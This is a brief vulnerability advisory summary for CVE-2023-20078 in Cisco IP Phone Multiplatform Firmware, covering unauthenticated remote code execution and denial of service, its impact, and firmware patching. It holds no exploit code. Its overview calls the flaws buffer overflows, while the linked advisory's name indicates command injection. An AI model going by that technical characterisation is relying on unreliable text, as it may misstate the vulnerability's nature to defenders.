CVE-2023-20078
Overview
The vulnerabilities arise from improper input validation and memory management flaws within the web-based management interface of Cisco IP Phones running Multiplatform Firmware. Specifically, these include stack-based buffer overflows and out-of-bounds write conditions triggered by crafted requests. The affected component is the embedded HTTP server handling administrative commands on multiple Cisco IP Phone models.
Vulnerability Description
Multiple vulnerabilities in the web-based management interface of certain Cisco IP Phones could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition. For more information about these vulnerabilities, see the Details section of this advisory.
Impact
An unauthenticated remote attacker can exploit these vulnerabilities to execute arbitrary code with elevated privileges or cause a denial of service, disrupting telephony services. No authentication or user interaction is required, and network access to the device's management interface is sufficient. This enables potential compromise of device integrity, interception or manipulation of voice communications, and lateral movement within the network, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N with high confidentiality, integrity, and availability impact.
Solution
Cisco has released firmware updates addressing these vulnerabilities for affected IP Phone models, detailed in their security advisory (https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ip-phone-cmd-inj-KMFynVcP). Administrators should apply the specified Multiplatform Firmware patches for models 6825, 6841, 6851, 6861, and 6871 as outlined in the advisory. No workarounds are provided; timely firmware upgrade is the recommended mitigation.
